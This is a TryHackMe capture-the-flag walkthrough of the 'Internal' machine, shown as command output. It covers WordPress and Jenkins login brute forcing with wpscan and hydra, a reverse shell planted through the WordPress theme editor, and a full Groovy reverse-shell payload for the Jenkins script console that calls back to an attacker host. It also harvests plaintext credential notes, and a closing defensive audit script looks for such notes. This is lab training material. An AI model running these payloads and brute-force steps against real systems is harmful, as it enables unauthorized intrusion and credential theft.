Categories: walkthrough
Tags: tryhackme, thm, wordpress, wpscan, phpmyadmin, Linux-Machine, Port-Forwarding, Jenkins
$ nmap -p1-65535 10.10.20.128 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 08:41 IST
Initiating Ping Scan at 08:41
Scanning 10.10.20.128 [2 ports]
Completed Ping Scan at 08:41, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:41
Completed Parallel DNS resolution of 1 host. at 08:41, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 08:41
Scanning 10.10.20.128 [2 ports]
Discovered open port 80/tcp on 10.10.20.128
Discovered open port 22/tcp on 10.10.20.128
Completed Connect Scan at 08:41, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.20.128
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-07-09 08:41:35 IST for 6s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
$ nmap -sV -sC -p22,80 10.10.20.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 08:43 IST
Nmap scan report for 10.10.20.128
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.78 seconds
No public exploits.
The only option is brute force, which we will keep as a last resort.
Adding internal.thm to /etc/hosts:
echo "<IP> internal.thm" >> /etc/hosts
Navigating to the web address, we get the default homepage.
Let's fuzz for directories.
$ ffuf -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://internal.thm/FUZZ -ic -e .php,.html,.txt,.php3,.php5,php7
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://internal.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .php3 .php5 php7
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
wordpress [Status: 301, Size: 316, Words: 20, Lines: 10]
javascript [Status: 301, Size: 317, Words: 20, Lines: 10]
blog [Status: 301, Size: 311, Words: 20, Lines: 10]
phpmyadmin [Status: 301, Size: 317, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [1543829/1543829] :: Job [1/1] :: 828 req/sec :: Duration: [0:29:46] :: Errors: 0 ::
Enumerating the directories
From the screenshots, the website is running on WordPress and the admin user has published a post.
Let's run wpscan for more enumeration.
$ wpscan --url http://internal.thm/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://internal.thm/wordpress/ [10.10.20.128]
[+] Started: Fri Jul 9 10:08:35 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://internal.thm/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://internal.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://internal.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://internal.thm/wordpress/wp-content/themes/twentyseventeen/
| Last Updated: 2021-04-27T00:00:00.000Z
| Readme: http://internal.thm/wordpress/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jul 9 10:08:50 2021
[+] Requests Done: 172
[+] Cached Requests: 5
[+] Data Sent: 38.706 KB
[+] Data Received: 359.73 KB
[+] Elapsed time: 00:00:15
WordPress is at version 5.4.2, and it didn't have any public exploits.
Let's brute force the login.
$ wpscan --url http://internal.thm/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / [REDACTED]
Trying admin / summertime Time: 00:00:53 < > (4000 / 14348392) 0.02% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: [REDACTED]
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jul 9 10:23:23 2021
[+] Requests Done: 4173
[+] Cached Requests: 6
[+] Data Sent: 1.953 MB
[+] Data Received: 2.706 MB
[+] Elapsed time: 00:01:12
Using the credentials to log in to WordPress.
With some search engine dorking, we can find how to get a reverse shell using WordPress:
through Dashboard > Appearance > Theme Editor.
Edited one of the PHP scripts, but was unable to activate it.
With the help of a search engine, we can find out where these files reside.
By navigating to
http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php
we got the reverse shell.
Spawning TTY
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/var/www/html/wordpress/wp-admin$
www-data@internal:/var/www/html/wordpress/wp-admin$ ^Z
[1] + 3089 suspended nc -nlvp 9898
$ stty raw -echo; fg
[1] + 3089 continued nc -nlvp 9898
www-data@internal:/var/www/html/wordpress/wp-admin$ export TERM=xterm
There is no access to the user's home directory
www-data@internal:/var/www/html/wordpress/wp-admin$ ls -l /home
total 4
drwx------ 7 aubreanna aubreanna 4096 Aug 3 2020 aubreanna
www-data@internal:/var/www/html/wordpress/wp-admin$
Checking for open sockets
www-data@internal:/var/www/html/wordpress/wp-admin$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 127.0.0.1:38331 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
www-data@internal:/var/www/html/wordpress/wp-admin$
We have a MariaDB/MySQL database running on the server, and from our enumeration phase we have the phpMyAdmin login page.
Let's enumerate phpmyadmin for DB login credentials.
www-data@internal:/var/www/html/wordpress/wp-admin$ cd /
www-data@internal:/$ find / -type d -name phpmyadmin 2> /dev/null
/var/lib/phpmyadmin
/etc/phpmyadmin
/usr/share/dbconfig-common/scripts/phpmyadmin
/usr/share/dbconfig-common/data/phpmyadmin
/usr/share/doc/phpmyadmin
/usr/share/phpmyadmin
www-data@internal:/$ cd /etc/phpmyadmin
www-data@internal:/etc/phpmyadmin$ ls
apache.conf config.footer.inc.php htpasswd.setup phpmyadmin.service
conf.d config.header.inc.php lighttpd.conf
config-db.php config.inc.php phpmyadmin.desktop
www-data@internal:/etc/phpmyadmin$ less config-db.php
www-data@internal:/etc/phpmyadmin$
$dbuser='phpmyadmin';
$dbpass= [REDACTED] ;
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
Using the credentials to log in to the DB
www-data@internal:/$ mysql -u phpmyadmin -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 99
Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| phpmyadmin |
+--------------------+
[...snip...]
mysql> select * from pma__users;
Empty set (0.00 sec)
mysql> quit
Bye
There is not much in the DB.
Trying other methods
www-data@internal:/$ find /home /var /opt -type f -perm /a+r -name "*.txt" 2>/dev/null
/var/log/installer/installer-journal.txt
/var/www/html/wordpress/license.txt
/var/www/html/wordpress/wp-includes/images/crystal/license.txt
/var/www/html/wordpress/wp-includes/ID3/readme.txt
/var/www/html/wordpress/wp-includes/ID3/license.txt
/var/www/html/wordpress/wp-includes/ID3/license.commercial.txt
/var/www/html/wordpress/wp-includes/js/plupload/license.txt
/var/www/html/wordpress/wp-includes/js/swfupload/license.txt
/var/www/html/wordpress/wp-includes/js/tinymce/license.txt
/var/www/html/wordpress/wp-content/plugins/akismet/readme.txt
/var/www/html/wordpress/wp-content/plugins/akismet/changelog.txt
/var/www/html/wordpress/wp-content/plugins/akismet/LICENSE.txt
/var/www/html/wordpress/wp-content/themes/twentytwenty/readme.txt
/var/www/html/wordpress/wp-content/themes/twentyseventeen/readme.txt
/var/www/html/wordpress/wp-content/themes/twentynineteen/readme.txt
/var/lib/cloud/instances/iid-datasource-none/vendor-data.txt
/var/lib/cloud/instances/iid-datasource-none/user-data.txt
/var/lib/cloud/instances/iid-datasource-none/cloud-config.txt
/opt/wp-save.txt
www-data@internal:/$ less /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna: [REDACTED]
Using the credentials, we are able to log in as the aubreanna user and get the user flag.
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
Using traditional tactics to find PrivEsc vulnerabilities
aubreanna@internal:~$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)
aubreanna@internal:~$ sudo -l
[sudo] password for aubreanna:
Sorry, user aubreanna may not run sudo on internal.
aubreanna@internal:~$ find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
aubreanna@internal:~$ find / -type f -perm /2000 -exec ls -l {} \; 2>/dev/null
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 30800 Mar 5 2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
aubreanna@internal:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Let's try to reach Jenkins on port 8080 for any possibilities
$ ssh -L 58553:localhost:8080 [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jul 9 21:24:47 UTC 2021
System load: 0.03 Processes: 116
Usage of /: 63.7% of 8.79GB Users logged in: 0
Memory usage: 45% IP address for eth0: 10.10.28.128
Swap usage: 0% IP address for docker0: 172.17.0.1
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
aubreanna@internal:~$
The default username for Jenkins is admin. Let's brute force the login page to get the password.
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 58553 http-form-post '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-10 03:12:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:58553/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[58553][http-post-form] host: localhost login: admin password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-10 03:13:22
We logged in to the Jenkins dashboard using the obtained credentials.
Jenkins has a script console which runs Groovy scripts.
Using Groovy to get the shell:
String host="<IP>";
int port=8585;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
We got the shell
$ nc -nlvp 8585
listening on [any] 8585 ...
pwd
whoami
jenkins
python -c 'import pty; pty.spawn("/bin/bash")'
jenkins@jenkins:/$
jenkins@jenkins:/$ ^Z
[2] + 4616 suspended nc -nlvp 8585
$ stty raw -echo; fg
[2] - 4616 continued nc -nlvp 8585
jenkins@jenkins:/$ export TERM=xterm
jenkins@jenkins:/$
We found the credentials and learned that this is a container
jenkins@jenkins:/opt$ find /etc /home /opt /var -type f -perm /a+r -name "*.txt" 2> /dev/null
/opt/note.txt
/var/jenkins_home/userContent/readme.txt
/var/jenkins_home/war/images/atom-license.txt
/var/jenkins_home/war/scripts/combobox-readme.txt
/var/jenkins_home/war/WEB-INF/update-center-rootCAs/jenkins-update-center-root-ca.txt
/var/jenkins_home/war/WEB-INF/update-center-rootCAs/jenkins-update-center-root-ca-2.txt
/var/jenkins_home/war/WEB-INF/classes/dependencies.txt
/var/jenkins_home/war/dc-license.txt
/var/jenkins_home/war/robots.txt
/var/jenkins_home/war/css/font-awesome/fonts/LICENSE.txt
/var/jenkins_home/war/css/font-awesome/css/LICENSE.txt
/var/jenkins_home/war/css/google-fonts/roboto/LICENSE.txt
jenkins@jenkins:/opt$ cat note.txt
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.
root: [REDACTED]
jenkins@jenkins:/opt$
By using the credentials obtained in the container on the target, we got the root flag.
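Both pivots on this box came from plaintext notes under /opt that a low-privileged service account could read (/opt/wp-save.txt on the host and /opt/note.txt in the container). The audit below is an added example, not part of the original walkthrough; it assumes such notes are exposed through the world-readable permission bit, and the patterns, file names and sample tree are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# "name: secret" on a line of its own, the shape of the notes shown above.
PAIR_RE = re.compile(r'^\s*[A-Za-z_][\w.-]{0,31}\s*:\s*\S{6,}\s*$')
HINT_RE = re.compile(r'(?i)\b(password|passwd|credential|secret)s?\b')


def world_readable_credential_notes(roots, max_bytes=65536):
    """Return [(path, [line numbers])] for regular files that any local user can
    read and that look like credential notes. Secrets are never returned."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in sorted(files):
                path = os.path.join(dirpath, name)
                try:
                    mode = os.lstat(path).st_mode
                    if not stat.S_ISREG(mode) or not mode & stat.S_IROTH:
                        continue          # symlink, device, or not world-readable
                    with open(path, "r", errors="replace") as fh:
                        text = fh.read(max_bytes)
                except OSError:
                    continue              # unreadable to the auditing account
                hits = [n for n, line in enumerate(text.splitlines(), 1)
                        if PAIR_RE.match(line)]
                if hits and HINT_RE.search(text):
                    findings.append((path, hits))
    return findings


def demo():
    """Run the audit over a constructed tree; returns (file name, lines) pairs."""
    note = ("Bill,\n"
            "Aubreanna needed these credentials for something later.\n"
            "aubreanna: EXAMPLE-not-a-real-password\n")
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode, body in [
            ("wp-save.txt", 0o644, note),            # world-readable: reported
            ("locked-note.txt", 0o600, note),        # owner-only: skipped
            ("license.txt", 0o644, "Released under the GPL.\n"),
        ]:
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, mode)
        return [(os.path.basename(p), lines)
                for p, lines in world_readable_credential_notes([tmp])]


if __name__ == "__main__":
    print(demo())
```

Run it against /opt, /srv and web roots on hosts and inside container images; anything it reports belongs in a secrets manager or, at minimum, behind owner-only permissions.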